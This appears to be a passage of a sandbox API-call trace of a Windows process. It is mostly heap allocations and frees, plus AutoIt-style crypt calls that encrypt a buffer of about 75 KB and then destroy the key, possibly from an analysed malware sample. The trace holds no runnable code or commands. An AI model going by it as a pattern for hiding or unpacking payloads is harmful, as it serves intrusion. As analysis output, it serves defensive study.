RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.221] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0198.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.222] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0198.223] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.224] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0198.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0198.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0198.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0198.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0198.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.228] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2788, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2788*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.228] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.228] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.228] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.228] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.228] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.228] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.229] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.229] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.229] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.229] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.229] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.229] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.229] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x12628, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x12630) returned 1 [0198.229] CharLowerBuffW (in: lpsz="byte[75313]", cchLength=0xb | out: lpsz="byte[75313]") returned 0xb [0198.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.230] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa71638*, pdwDataLen=0x87e820*=0x12628, dwBufLen=0x12630 | out: pbData=0xa71638*, pdwDataLen=0x87e820*=0x12630) returned 1 [0198.231] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.238] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.239] CryptDestroyKey (hKey=0x90af98) returned 1 [0198.239] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.239] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.239] 